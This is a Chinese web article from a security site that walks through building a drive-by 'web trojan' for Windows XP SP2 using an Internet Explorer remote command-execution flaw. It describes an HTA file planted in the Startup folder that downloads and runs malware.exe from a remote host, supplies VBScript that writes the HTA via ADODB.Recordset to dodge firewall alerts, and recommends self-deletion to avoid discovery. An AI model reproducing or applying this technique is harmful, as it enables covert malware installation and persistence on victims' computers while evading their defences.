精典的ASP传奇的J2EE新生的NETFTP服务器服务器安全WINDOWSB/S 模式WEB安全WAP世界动态网站推广宣传
空间服务器数据库技术邮局服务器站長工具硬设与组建Alexa专题DHTML项目管理WEB标准电脑硬件
病毒知识电脑使用布线协议接入交换路由局域网无线网络网络规划
Visual BasicVisual C/C++MssqlMySqloracleSybase 存在安全风险进程系统进程列表应用程序进程列表其它进程列表
黑客编程漏洞分析本地提权免杀技术脚本漏洞数据库注入安全防护内网渗透加密解密工具使用
WAP技术WAP入门
 您的位置:   >> 相关知识 >> WEB开发 >> WEB安全 >>

Windows XP SP2网页木马制作思路分析

合金网络科技

  
  添加日期:2005-9-15 点击次数:125次  
   
  利用漏洞
Microsoft Internet Explorer SP2远程任意命令执行漏洞

发布日期:2004-12-23

受影响系统:
Microsoft Internet Explorer 6.0SP2
   - Microsoft Windows XP Professional SP2
   - Microsoft Windows XP Home SP2

Microsoft Internet Explorer结合多种漏洞如Help ActiveX控件等问题,远程攻击者可以利用这个漏洞无需用户交互来执行任意文件而导致恶

意代码执行.

详见:绿盟

冰狐浪子的个人测试及分析

因为所公布的测试页面是用于英文版本的winxp系统,所以用中文系统测试前,要先建立如下目录

C:\Documents and Settings\All Users\Start Menu\Programs\Startup\

我利用所给的测试页面进行测试,发现如果装有防火墙,会提示应用程序alg.exe访问网络,选择允许后,察看C:\Documents and Settings\All

Users\Start Menu\Programs\Startup\目录发现被写入一文件'Microsoft Office.hta',运行'Microsoft Office.hta',发现自动从

http://freehost07.websamba.com/greyhats/malware.exe下载并运行了一个精美的火焰DEMO,C盘根目录下面出现malware.exe程序[需要说明的是运行Microsoft Office.hta时防火墙并没有报警]!
我察看代码后发现防火墙报警的原因为writehta.txt里的代码是通过访问远程数据库来获得要写入Microsoft Office.hta里的代码的,如果

我们不访问数据库而直接把hta的代码写到脚本里,就可以不引起防火墙的报警啦!呵呵
方法是调用ADODB.Recordset,把用到的代码写为一条记录,我也是在网上找到的代码代码如下:

on error resume next
set evanchik = CreateObject('ADODB.Recordset')
  With evanchik
      .Fields.Append 'evanchik', 200, '3000'
      Call .Open
      Call .AddNew
      .Fields('evanchik').Value = 'meaning less shit i had to put here'
      Call .AddNew
      .Fields('evanchik').Value = '此处写上要写到启动目录里的具体代码'
      Call .Update
  End With
evanchik.Save 'C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Microsoft Office.hta', adPersistXML
evanchik.Close

解决了防火墙问题,接下来就要看如何隐蔽开机后hta文件的运行啦,具体我就不写啦,请参照网上以前object漏洞的利用代码,也就是现在网上所

谓的'不闪的网页木马'!需要注意一点,hta最好加上自动删除功能,这样就运行一次后不会被后来轻易发现!

另外这个漏洞做的网页木马会打开一帮助文件,如果你觉得不太好的话,可以利用帮助控件里的
Close参数进行自动关闭!
至此一个XPsp2的网页木马顺利完工!

不足之处:
1.因为我没找到可以直接自动运行的方法,只有写到启动文件夹里,等机器重新启动后运行hta文件,容易被发现后清除,使得木马无法被下载运行
2.因为要调用本地的htm或chm文件,获得写文件权限,所以当系统不是默认安装在C盘下时,无法写入文件!

最后,祝愿大家新年万事如意,每天有个好心情!祝我的GG朋友们找个PPMM.
精典的ASP精选TOP
· 利用ADODB.Stream 防盗链
· Adodb.Stream说明手册
· 采集需要登录
· ASP 判断远程图片是否存在
· 在ServerXMLHTTP组件中使用代理服务器
· 用XMLHTTP通过代理服务器从服务提取数据的一些问题
· objXML.readystate的值
· 互联网HTTP连接等出错代码大全
· 利用XMLHTTP实现的二级连动Select
· 利用 xmlhttp 分块上传文件
 
服务器安全点击TOP
· 新云最新漏洞总结篇
· 各类网站的默认数据库和密码
· Windows Server2003 防木马权限设置IIS服务器安全配置整理
· 针对ASP网站的Win 2003硬盘安全设置
· IIS 6 的PHP 最佳配置方法
· 利用SA.exe 将Iusr_victim克隆为Administrator
· Cmd模式下的入侵技术大全
· 破解网页代码加密
· SERV-U 6.4提权方法,通杀SERV-U版本
· 新云网站管理系统文件注入漏洞
 
硬设与组建点击TOP
· 从头到尾教你组建小型局域网20
· 从头到尾教你组建小型局域网19
· 从头到尾教你组建小型局域网18
· 从头到尾教你组建小型局域网17
· 从头到尾教你组建小型局域网16
· 从头到尾教你组建小型局域网15
· 从头到尾教你组建小型局域网14
· 从头到尾教你组建小型局域网13
· 从头到尾教你组建小型局域网12
· 从头到尾教你组建小型局域网11
 
病毒知识点击TOP
· 不再重装 手动清除顽固病毒AutoRUN
· 木马静态变动态 DLL木马程序大揭秘
· 详解一个很牛X的网马
· 一个网马
· Trojan-Downloader.Win32.Delf.bab
· 抓了一个AJAX的网马
· 迅雷5 最新0day利用程序
· 自动关掉270种杀毒软件
· RealPlayer 最新网马
· 五个反弹型后门的源代码
 
WINDOWS点击TOP
· 4【系统知识】常见文件扩展名及简要说明!!! ==超详尽==
· 3【系统知识】常见文件扩展名及简要说明!!! ==超详尽==
· 2【系统知识】常见文件扩展名及简要说明!!! ==超详尽==
· 1【系统知识】常见文件扩展名及简要说明!!! ==超详尽==
· Capture an HTML document as an image
· 如何给eWebEditor编辑器加上运行代码框功能
· 给CuteEditor5增加了高亮代码显示功能
· CuteEditor6.0使用配置心得体会
· 关于IE插件的CLSID问题
· 对开发的程序(制作CAB)进行签名,并允许网站中使用
  "凌风微型文章系统",针对"搜索引擎"完美设计,提高"搜索引擎"对网站容量,质量的评估值,"扁平化,转静态 ..."